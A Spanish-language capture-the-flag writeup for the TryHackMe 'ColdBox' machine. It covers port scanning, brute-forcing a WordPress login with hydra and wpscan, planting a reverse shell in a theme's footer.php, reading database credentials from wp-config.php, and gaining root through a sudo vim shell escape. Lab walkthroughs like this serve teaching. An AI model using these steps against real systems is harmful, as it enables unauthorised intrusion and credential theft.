En este writeup exploraremos la máquina ColdBox de TryHackMe, una sala de dificultad facil que pone a prueba nuestras habilidades en reconocimiento, análisis de servicios expuestos y explotación de vulnerabilidades en entornos web.
Nivel > #Facil
Plataforma #tryhackme
------------------------------------------------------------
Skills:
- wordpress enumeration
- Reverse shell
- Fuzzing
- Escalada de privilegios "permisos sudo"
-------------------------------------------------------------
#VPN
Como esta es una maquina de tryhackme es necesario descargar el archivo vpn en la zona de profile -acces - descargar y ejecutamos
```
openvpn tu_archivo_vpn.ovpn
```
Creamos directorios y subdirectorios para organizar la evidencia
#enumeracion
1. Lo primero como siempre es conocer los puertos y servicios que corren bajo la aplicación.
```
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.33.83 -oG allports
```
2. Extraemos los puertos a la clipboard
```
extractPorts allports
```
3. Realizamos un escaneo profundo para verificar servicios y versión de los mismos.
```
nmap -sCV -p80,4512 10.10.33.83 -oN targeted
```
4. como hay un puerto 80 verificamos en navegador y podemos observar que es un wordpress
5. Identificamos con waapalizer o whatweb y es un wordpress 4.1.23
6. se realiza fuzzing para tratar de encontrar directorios.
```
gobuster dir -u http://10.10.33.83/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
```
7. se encuentra el directorio /Hidden/ que nos brinda 3 posibles usuarios c0ldd, phillip y Hugo
![[Pasted image 20250308003220.png]]
8. realizamos ataque de fuerza bruta para tratar de adivinar la contraseña de wordpress.
a. Con hydra
```
hydra -l c0ldd -P /usr/share/wordlists/rockyou.txt 10.10.33.83 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=incorrect"
```
b. con wpscan
```
wpscan --url http://10.10.33.83/ -U C0ldd -P /usr/share/wordlists/rockyou.txt
```
1. Nos fogueamos en WordPress y una vez en el panel de administración nos dirigimos a _apariencia_ - Temas - Editar y en la seccion footer.php (esta no cuenta con 404 funcional) pegamos la reversehll que podemos generar desde la pagina https://www.revshells.com/
nota: en la aplicación revshells generamos una revershell monkey, procedemos a ponernos en escucha con el puerto definido en la shell.
```
nc -lvnp 9001
```
En este caso no haremos tratamiento tty, pues lo intente en varias ocasiones y no podia explotar el binario VIM que posee permisos sudo. por esta razon invocaremos el python
```
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
```
En este punto exploramos carpetas, hasta llegar a la carpeta que contiene el wordpress /var/www/html y alli buscamos el archivo wp-config.php , al darle cat podemos observar que contiene credenciales de la BD en este caso c0ldd : cybersecurity
También podremos encontrar la bandera de user.txt
escalamos privilegios.
```
su c0ldd
password: cybersecurity
```
y ejecutamos un sudo -l para saber que puede ejecutar el usuario c0ldd como root
En este caso vemos que puede ejecutar el binario VIM , en la pagina https://gtfobins.github.io/ puedo conocer para que sirve y la manera de explotar cada binario. en este caso y por las características del permiso lo ejecutaremos así
```
sudo vim -c ':!/bin/sh'
```
En este punto ya somos root
```
find /root/root.txt
cat /root/root.txt
```
y listo :)
